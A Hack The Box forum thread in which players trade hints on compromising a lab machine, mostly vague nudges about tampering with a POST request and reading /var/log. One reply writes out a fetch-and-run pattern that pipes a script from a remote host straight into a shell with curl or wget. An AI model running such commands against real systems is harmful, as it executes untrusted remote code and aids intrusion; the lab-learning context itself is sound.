Official Academy Discussion

13468916

Comments

  • need a hint with root, going through /var/log but i can't get clue to root this box.

  • edited November 2020

    Type your comment> @0xstain said:

    need a hint with root, going through /var/log but i can't get clue to root this box.

    Are you going through /var/log with the user with user.txt in his home folder?

  • edited November 2020

    removed by user

  • Hello Guys and Gals,

    Could someone possibley help me with the Foothold - Ive found a bunch of stuff, tried some brute forcing, enum with Burp, Zap, Nikto, etc and still struggling. My weak point is defiantly DNS Enumuration so this could possibly be my weakness here.

    Many Thanks, Taz

  • @TaZ0w said:

    Hello Guys and Gals,

    Could someone possibley help me with the Foothold - Ive found a bunch of stuff, tried some brute forcing, enum with Burp, Zap, Nikto, etc and still struggling. My weak point is defiantly DNS Enumuration so this could possibly be my weakness here.

    Many Thanks, Taz

    I doubt that DNS enum/fuzzing will get you anywhere. You should rather investigate data you send to and receive from the server.


    Hack The Box
    GREM | OSCE | GASF | eJPT

  • @TaZ0w said:

    Could someone possibley help me with the Foothold - Ive found a bunch of stuff, tried some brute forcing, enum with Burp, Zap, Nikto, etc and still struggling.

    Have you visited the site in a browser?

    Have you run a directory busting tool? (I found gobuster better than dirb here but YMMV).

    If the answer to both is "yes" then look into what happens when you create a new thing and see what you can modify. When you modify it in a way it still works, see if you can now access one of the other things you should have found.

    My weak point is defiantly DNS Enumuration so this could possibly be my weakness here.

    HTB doesn't tend to use DNS.

    Many Thanks, Taz

    Hi :smile:

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

    Currently have very limited HTB time but will try to respond as quickly as possible.

  • edited November 2020

    Type your comment> @TazWake said:

    @TaZ0w said:

    If the answer to both is "yes" then look into what happens when you create a new thing and see what you can modify. When you modify it in a way it still works, see if you can now access one of the other things you should have found.

    My weak point is defiantly DNS Enumuration so this could possibly be my weakness here.

    HTB doesn't tend to use DNS.

    Many Thanks, Taz

    Hi :smile:

    Hey fellow Taz :smile:

    Yes to both of those - Your comment here though has made something go "ping" in my head. Thanks man, let me have a poke around, i`ll let you know how I get on!

    T

  • edited November 2020

    Type your comment> @TazWake said:

    @TaZ0w said:

    Hi :smile:

    Jesus, thanks man - Its amazing how simple some things can be - ive spent liturally 2 hours on DNS today and it was as simple as the r****d :smile:

    i now have the sub domain, so onwards and upwards! :)

  • @TaZ0w said:

    Yes to both of those - Your comment here though has made something go "ping" in my head. Thanks man, let me have a poke around, i`ll let you know how I get on!

    Awersome.

    A small change on one POST request should allow you access a page you couldn't access before. That holds a wealth of useful information.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

    Currently have very limited HTB time but will try to respond as quickly as possible.

  • edited November 2020
    I'm so lost getting 2nd user. Spent hours in /var/logs but I'm not sure what to look for. Could someone PM me a nudge?

    edit: nevermind, i got it
  • For anyone who reads this: use mktemp -d to create a temporal directory and stop downloading your scripts on /home directory

  • @Feror said:

    For anyone who reads this: use mktemp -d to create a temporal directory and stop downloading your scripts on /home directory

    There's no need to even download the scripts to disk, you can simply curl http://ip:port/script.sh | sh (or wget -O - ... when curl isn't available)


    Hack The Box
    GREM | OSCE | GASF | eJPT

  • edited November 2020

    So many hours wasted trying to grep through /var/logs. Once I got past the first user I got root within 5 minutes.

    Had to use a local tool I'd never heard of before. Feel free to PM for nudges but let me know what you've already tried. Plenty of hints for foothold and first user through the thread

    cmoon

  • Really funny box, if anyone get stuck on log files, update your enum script version and try again(it took my 2 hour :( )

    Thanks for this box :) Rooted


    Hack The Box

    You can pm me on discord sh4d0wless#6154

  • Type your comment> @tsheva said:

    Type your comment> @0xstain said:

    need a hint with root, going through /var/log but i can't get clue to root this box.

    Are you going through /var/log with the user with user.txt in his home folder?

    yes i have user not www-data.

  • Hello friends I hope that you are doing great out there. I'm stuck with root. When I try to run the script c******* run-script command I was ended up with this error Script "command" is not defined in this package. Any solution or hint appreciated.

  • nice box, finally rooted! If you need nudge, can PM me

    akhlaqur

  • Finally rooted! if anyone needs a nudge PM me

  • fun box

    Hack The Box

  • Finally made it. Feel free to PM for a nudge.

    Harbard

  • rooted, need a nudge? just pm.

  • Rooted now, learned some things doing this box!

  • What a traumatic machine... I was soo frustrated, that I was going to skip this machine. Thanks to @IvanV who motivated me to go on.

    Lesson learned: Even when you think you know how to retrieve things, GOOGLE IT!!!! 😂

  • Anyone do the user part manually?

    Huejash0le

  • I was able to escalate my privs on the webpage but I don't fully understand why it worked that way. Can someone point me in the right direction on documentation or explain why changing a certain value worked the way it did? Thanks in advanced!

  • edited November 2020

    Rooted the machine, it was really fun box, learned alot.
    PM for nudge, good luck

  • Rooted. The hardest part was definitely getting that 2nd user. Foothold wasn't too bad and root was the easiest. @sh4d0wless mentioned updating enum script and running again. That's what did it for me.

  • edited November 2020

    I too am stuck on the foothold thing. I believe I found the small change I need to make I would be happy to discuss my strategy to see if I am headed in the right direction. So far none of the changes allows any new accesses. I'm sure its got to be something even more simple than what I'm attempting...

  • @Sc0rp10ne said:

    I too am stuck on the foothold thing. I believe I found the small change I need to make I would be happy to discuss my strategy to see if I am headed in the right direction. So far none of the changes allows any new accesses. I'm sure its got to be something even more simple than what I'm attempting...

    It is a small change. When you make it and it still works, you can log in to a new page with the credentials you have created.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

    Currently have very limited HTB time but will try to respond as quickly as possible.

Sign In to comment.